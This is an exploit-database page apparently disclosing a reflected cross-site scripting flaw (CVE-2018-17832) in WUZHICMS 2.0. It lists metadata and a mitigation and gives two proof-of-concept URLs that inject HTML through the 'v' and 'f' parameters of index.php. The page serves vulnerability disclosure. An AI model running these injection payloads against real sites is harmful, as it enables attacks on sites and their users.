header-logo
Suggest Exploit
vendor:
WUZHICMS 2.0
by:
Felipe 'Renzi' Gabriel
6.1
CVSS
MEDIUM
Cross-Site Scripting
79
CWE
Product Name: WUZHICMS 2.0
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: Yes
Related CWE: CVE-2018-17832
CPE: 2.3:a:wuzhicms:wuzhicms:2.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
2018

WUZHICMS 2.0 – Cross-Site Scripting

A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0 web-application. The vulnerability is located in the 'v' and 'f' parameters of the`index.php` action GET method request.

Mitigation:

Upgrade to the latest version of WUZHICMS 2.0
Source

Exploit-DB raw data:

# Title: WUZHICMS 2.0 - Cross-Site Scripting 
# Author: Felipe "Renzi" Gabriel
# Date: 2018-10-01
# Vendor: http://www.wuzhicms.com
# Software: WUZHICMS 2.0
# CVE: CVE-2018-17832
 
# Technical Details & Description:
# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0  web-application.
# The vulnerability is located in the 'v' and  'f' parameters of the`index.php` action GET method request.
   
# PoC

http://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>

http://Target/index.php?f="><marquee><h1>RENZI</h1></marquee>

Navigation

Suggest Exploit

Services By CQR